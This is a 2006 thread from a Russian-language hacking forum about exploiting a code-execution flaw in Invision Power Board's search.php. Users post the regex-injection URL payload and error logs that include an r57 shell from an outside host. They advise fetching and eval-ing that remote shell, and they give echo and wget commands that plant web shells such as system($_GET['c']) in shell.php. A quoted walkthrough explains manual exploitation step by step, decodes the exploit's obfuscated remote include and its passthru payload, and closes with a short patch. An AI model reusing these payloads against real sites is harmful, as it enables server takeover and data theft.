ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
01.05.2006, 18:06
|
|
Новичок
Регистрация: 20.04.2006
Сообщений: 5
Провел на форуме:
108775
Репутация:
0
|
|
Добавил &lastdate=z|eval.*?%20//)%23e%00 и появилась вверху такая надпись:
Код:
IPB WARNING [2] include() [function.include]: URL file-access is disabled in the server configuration (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include(http://rst.void.ru/download/r57shell.txt) [function.include]: failed to open stream: no suitable wrapper could be found (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include() [function.include]: Failed opening 'http://rst.void.ru/download/r57shell.txt' for inclusion (include_path='.:/opt/php/lib/php:/home/users/e/evsu/incs') (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
На локалке всё прошло на ура, а вот уже в инете так. |
|
|
01.05.2006, 18:59
|
|
Новичок
Регистрация: 25.01.2006
Сообщений: 8
Провел на форуме:
76510
Репутация:
2
|
|
Сообщение от Sanyk36
Добавил &lastdate=z|eval.*?%20//)%23e%00 и появилась вверху такая надпись:
Код:
IPB WARNING [2] include() [function.include]: URL file-access is disabled in the server configuration (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include(http://rst.void.ru/download/r57shell.txt) [function.include]: failed to open stream: no suitable wrapper could be found (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include() [function.include]: Failed opening 'http://rst.void.ru/download/r57shell.txt' for inclusion (include_path='.:/opt/php/lib/php:/home/users/e/evsu/incs') (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
На локалке всё прошло на ура, а вот уже в инете так. Запрещено использование include попробуйте с помощью php фаила, приложенного в архиве закодить что-нибудь наподобии.
$file=join("",file("http://rst.void.ru/download/r57shell.txt"));
eval($file);
и его заслать
|
|
|
|
01.05.2006, 18:31
|
|
Познающий
Регистрация: 03.04.2006
Сообщений: 31
Провел на форуме:
175806
Репутация:
14
|
|
Да сейчас много где это идет на ура (мега респект автару) но то что мне действительно нодо не кактит...
|
|
|
|
01.05.2006, 18:51
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132
Репутация:
116
|
|
Там не дает просто белая страничка, еще одно Otaku пишет то на сниффер придёт
а если у меня нет снифера куда тогда оно предет? ) ладно если будет минутка помогите
разабратся) спосибо
Аффтар ты!!!
Например вот неплохой сниффер ресурс:
http://s.netsec.ru/
|
|
|
|
02.05.2006, 10:49
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
|
|
|
|
02.05.2006, 15:59
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800
Репутация:
547
|
|
Они уже пропатчили форум.
|
|
|
|
02.05.2006, 16:46
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
я нашол форум ломаемы.... но он на винде... там пашет dir, md и т.д.
как можно закачать шелл или скачать сонфиг... бо не получаеться! =(
|
|
|
|
02.05.2006, 17:39
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
Сообщение от Grema
я нашол форум ломаемы.... но он на винде... там пашет dir, md и т.д.
как можно закачать шелл или скачать сонфиг... бо не получаеться! =(
Шелл примерно так. Узнай путь и напиши выполни.
echo "<? include($xxx); ?>" > c:\xxx2.txt
причем файл создаться с ковычками, но они не должны повлиять на код.
Или как показано в http://video.antichat.ru/file196.html через ФТП команды.
а линуксовская команда CAT равнозначна мелкомягкой TYPE
(type c:\xxx2.txt)
|
|
|
|
02.05.2006, 18:16
|
|
Новичок
Регистрация: 02.05.2006
Сообщений: 2
Провел на форуме:
13209
Репутация:
0
|
|
а если сервак на linux, echo ведь прокатит?
вот такой код
echo "<? system($_GET['c']) ?> " > ./shell.php
запишет в shell.php строку с system? а то у меня не получается.
и еще как то странно себя ведет wget я делаю cd ./uploads/; wget _http://serv/shell.php;
вроде бы записывает в файл, файл появляеться. но когда его запускаю, он показывает файлы с моего сервера... что делать?
Последний раз редактировалось 4lex; 02.05.2006 в 18:44..
|
|
|
|
02.05.2006, 22:58
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Статейка в тему, думаю полезно будет...
Код:
Совсем недавно появился эксплоит для удаленного исполнения команд в популярном форуме Invision Power Board.
Уязвимость, к слову говоря, кроется в файле sources/action_public/search.php, в регулярном выражении. Выполнив определенные действия, злонамеренный пользователь получал веб-шелл. Товарищ 1dt.w0lf из команды RST не теряя времени написал эксплоит для этой уязвимости. По-моему, это был первый паблик-эксплоит для этой дыры. Однако с эксплоитом у многих возникают проблемы: команды не выполняются. Нет, в самом эксплоите никакой ошибки нет, просто Вульф пошел по пути меньшего сопротивления, нежели авторы других эксплоитов для этой уязвимости.
Давайте обратим внимание на эту строку (#95)
$text = ‘r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).
chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).
chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53)’.
‘.chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).
chr(120).chr(116))); //’;
Напишем небольшой скрипт на perl и посмотрим, что же скрывается в этой строке. А скрывается там строка
http://rst.void.ru/r57ipbinc.txt
А вот и содержание этого текстового файла:
<?
/*
r57ipbce exploit include file
*/
passthru($_GET[’eharniy_ekibastos’]);
?>
То есть в eval выполняется инклюд удаленного файла. Ловушки тут никакой нет, просто так проще получить шелл. Однако далеко не на всех серверах возможен инклюд удаленных файлов (чаще всего причина - allow_url_fopen=0). Тупик? Нет! Сейчас я вам расскажу, как эксплуатировать эту ошибку вручную. И вы увидите, что это вовсе не сложно.
Итак, перво-наперво, найдем себе подходящую жертву. Я выбрал IPB 2.1.5 (доступный по адресу 127.0.0.1 естественно).
Залогинимся (зарегистрируемся, если еще не сделали этого), перейдем в форум, где мы можем оставлять сообщения.
Создаем сообщение, содержащее текст:
eval(phpinfo()); //
Создали? Теперь откройте новую закладку в браузере (так удобнее будет) и перейдите к поиску. В поиске укажите: искомый текст eval, ваш логин, а также не забудьте указать “Показывать результаты ввиде сообщений”. Ищем только что созданный пост. Нашелся? Замечательно. Теперь в этом же окне добавьте в конец URL такую строчку:
&lastdate=z|eval.*?%20//)%23e%00
Адресная строка браузера должна иметь приблизительно такой вид:
http://localhost/ipb/index.php?act=Search&CODE=show&searchid=…&search_in=posts&result_type=posts&highlite=system&lastdate=z|eval.*?%20//)%23e%00
Жмите enter. Если вы все сделали правильно и форум уязвим, то вы увидите вывод информации о интерпретаторе PHP.
Но нам нужен шелл.
Вернемся к нашему сообщению. Надеюсь, у вас есть права на его редактирование? Если это так, переходите к его редактированию. Однако у этой уязвимости есть одна особенность: вы не можете использовать функции в привычном виде (system(”ls”) например). Нужно все символы аргументов переводить из их кода. То есть вместо system(”ls”) писать system(chr(34).chr(108).chr(115).chr(34)). Согласитесь, что это не совсем удобно, самому деражть в голове, искать где-то коды символов. Поэтому я набросал простенькую утилиту, которая преобразует команду за вас и выведет ее в пригодной для употребления форме. Например, вы вводите ls, а на выходе получаете строку eval(system(chr(108).chr(115)).chr(59).exit()); //. Утилита также содержит сей хэлп, только на английском языке (заранее приношу извинения, если что-то не так написал). Вы можете просто пропустить весь хэлп и и перейти непосредственно к энкодеру.
Отредактировав сообщение, возвращайтесь к странице поиска и просто обновите ее. Таким образом, вы можете выполнять любые доступные вам команды.
Теперь перейдем к защите от этой напасти. Открываем файл sources/action_public/search.php и ищем в нем регулярное выражение:
this->output = preg_replace( “#(value=[\”‘]{$this->ipsclass->input[’lastdate’]}[\”‘])#i”, “\\1 selected=’selected’”, $this->output );
Которое заменяем на:
$this->output = preg_replace( “#(value=[\”‘]”.intval($this->ipsclass->input[’lastdate’]).”[\”‘])#i”, “\\1 selected=’selected’”, $this->output );
Как видите, патч состоит в том, что уязвимый параметр приводится к типу integer.
P.S. Ни я, ни кто другой не несут ответственности за применение этой информации.
© not null | Security Bunker Team
__________________
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид